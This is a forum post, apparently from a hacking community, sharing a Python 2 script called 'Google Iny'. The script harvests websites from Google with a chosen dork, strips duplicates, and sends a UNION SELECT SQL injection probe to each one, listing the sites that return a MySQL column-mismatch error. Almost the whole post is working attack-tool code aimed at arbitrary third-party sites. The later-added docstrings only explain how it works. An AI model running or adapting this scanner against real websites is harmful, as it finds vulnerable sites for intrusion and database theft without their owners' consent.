Bueno, acabo de hacer un scanner de sqli.
Este busca en Google páginas con un dork marcado por ustedes,
para después borrar repetidos y escanear las webs encontradas.
#!/usr/bin/python
#Google Iny (C) Doddy Hackman 2011
import urllib2,re,os,sys
def head():
    """Write the tool banner to stdout (two leading blank lines, one trailing)."""
    sys.stdout.write("\n\n -- == Google Iny == --\n\n")
def copyright():
    """Write the credits line and terminate the process with exit status 1.

    Raises:
        SystemExit: always, with code 1 (the script uses this as its hard stop).
    """
    sys.stdout.write("\n(C) Doddy Hackman 2011\n\n")
    raise SystemExit(1)
def toma(web):
    """Perform an HTTP GET of ``web`` and return the raw response body.

    Args:
        web: absolute URL to fetch.

    Returns:
        The response body as returned by ``read()``.

    Any urllib2/socket error raised by the request propagates to the caller;
    the request carries a fixed Firefox 3 User-Agent header.
    """
    peticion = urllib2.Request(web)
    peticion.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')
    return urllib2.build_opener().open(peticion).read()
def show():
    """Write the usage line to stdout, naming the running script via ``sys.argv[0]``."""
    # Two spaces around the script name reproduce the comma-separated print spacing.
    sys.stdout.write("\n[+] Sintax :  %s  <dork> <count>\n\n" % sys.argv[0])
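def limpiar(pag):
    """Drop Google's own links from ``pag`` and remove duplicates.

    Args:
        pag: iterable of URL strings (entries must be hashable).

    Returns:
        A new list holding, in first-seen order, every entry that does not
        match the Google host pattern, each at most once.

    The host pattern is applied as a regex with re.I, as in the original
    filter, so the dots match any character.
    """
    google = re.compile("http://www.google.com.ar", re.I)
    vistos = set()  # O(1) membership test instead of rescanning the result list
    limpia = []
    for p in pag:
        if google.search(p) or p in vistos:
            continue
        vistos.add(p)
        limpia.append(p)
    return limpia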
def sql(webs):
    """Probe each URL in ``webs`` sequentially and print those whose response matches.

    For a URL containing ``=``, only the text up to and including the first
    ``=`` is kept and every later query parameter is discarded. The fixed
    probe string is appended, the page is fetched with ``toma`` and the body
    is searched (case-insensitively) for the literal server error text; a hit
    prints the URL. URLs without ``=`` are skipped silently. Returns None.
    """
    for web in webs :
        if re.findall("=",web):
            # Everything after the first '=' is thrown away; only the prefix
            # plus a single '=' is kept.
            web = re.split("=",web)
            web = web[0]+"="
            try:
                # The probe is sent verbatim in the query string, so it appears
                # unchanged in the target server's access logs.
                code = toma(web+"-1+union+select+1--")
                if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
                    print "[SQLI] : ",web,"\n"
            except:
                # Bare except swallows everything, including KeyboardInterrupt and
                # SystemExit, so an interrupt during a fetch does not stop the loop.
                pass
def scan(dork,count):
    """Collect result links from Google for ``dork`` at offsets 10, 20, ... <= ``count``.

    Args:
        dork: search string, concatenated into the query URL as-is.
        count: upper bound for the ``start`` offset (string or int; converted
            with ``int()`` on every loop test, so a non-numeric value raises
            ValueError here, outside the try).

    Returns:
        The collected links after ``limpiar`` (Google links and duplicates removed).

    Any exception raised while fetching or parsing a result page reaches the
    bare except, which calls ``copyright()``; that exits the process, so a
    single failed request aborts the run and nothing collected is returned.
    """
    pag = []
    s = 10  # the first page (start=0) is never requested
    while s <= int(count):
        try:
            code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
            # Links are pulled out of the raw HTML with a fixed lookbehind pattern;
            # if the markup does not match, findall returns [] and the page adds nothing.
            d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
            s += 10
            for a in d:
                pag.append(a)
        except:
            # Also reached on KeyboardInterrupt; copyright() never returns.
            copyright()
    pag = limpiar(pag)
    return pag
# Script entry: banner, argument check, then the scan/probe pipeline.
head()
if len(sys.argv) != 3:
    # Exactly <dork> and <count> are required; otherwise print usage and fall
    # through to copyright(), which exits with status 1.
    show()
else :
    print "\n[+] SQL Scan Started\n"
    print "[+] Dork : ",sys.argv[1]
    print "[+] Count : ",sys.argv[2]
    # count is passed as a string; scan() applies int() to it in its loop
    # condition, so a non-numeric value raises an uncaught ValueError here.
    pages = scan(sys.argv[1],sys.argv[2])
    print "\n[+] Webs Found : ",len(pages),"\n"
    sql(pages)
# Always exits with status 1, even after a successful run.
copyright()